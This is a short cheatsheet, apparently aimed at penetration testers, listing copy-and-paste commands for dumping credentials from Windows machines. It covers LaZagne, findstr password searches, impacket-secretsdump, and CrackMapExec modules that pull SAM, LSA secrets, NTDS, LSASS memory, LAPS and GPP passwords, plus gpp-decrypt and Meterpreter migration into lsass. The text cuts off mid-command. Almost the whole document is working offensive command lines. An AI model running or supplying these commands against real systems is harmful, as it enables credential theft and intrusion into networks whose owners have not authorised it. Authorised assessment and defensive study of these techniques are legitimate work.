Windows — Credentials Dumping

Cheatsheet with current tools & techniques for Windows credentials dumping.

INTRODUCTION

The article presents the current tools & techniques for Windows credential dumping. It will be very short and written in cheatsheet style. The main goal was to aggregate commands in one place, so you can just copy&paste them during the assessment. As a bonus to this short article, in the end, you will find the commands for cracking Windows hashes using John The Ripper and Hashcat.

TOOLS

1. LaZagne
2. Impacket
3. CrackMapExec
4. HiveNightmare (CVE-2021–36934)
5. Meterpreter — credential_collector
6. Meterpreter — smart_hashdump

COMMANDS

• Finding passwords for the most commonly-used software:

laZagne.exe all

• Manual search for the text ‘password’ in certain file types:

findstr /si 'password' *.txt *.xml *.docx

• Remote hash dumping without executing any agent on the target:

impacket-secretsdump $domain/$user:$pass@$ip

• Various hash dumping techniques using CME:
  (use option --local-auth if your user is a local account)

crackmapexec smb $ip -u $user -p $pass --sam
crackmapexec smb $ip -u $user -p $pass --lsa
crackmapexec smb $ip -u $user -p $pass --ntds
crackmapexec smb $ip -u $user -p $pass --ntds vss
crackmapexec smb $ip -u $user -p $pass -M lsassy
crackmapexec smb $ip -u $user -p $pass -M wireless
crackmapexec smb $ip -u $user -p $pass -M handlekatz
crackmapexec smb $ip -u $user -p $pass -M nanodump
crackmapexec smb $ip -u $user -p $pass -M procdump
crackmapexec smb $ip -u $user -p $pass --laps
crackmapexec smb $ip -u $user -p $pass -M gpp_password

If the default administrator name is not administrator add the user name after the option: --laps <name>

• Decrypting GPP:

gpp-decrypt $encrypted_password

• Meterpreter modules:
  (A good idea is to first migrate to the lsass.exe process)

migrate <id of lsass.exe>
run…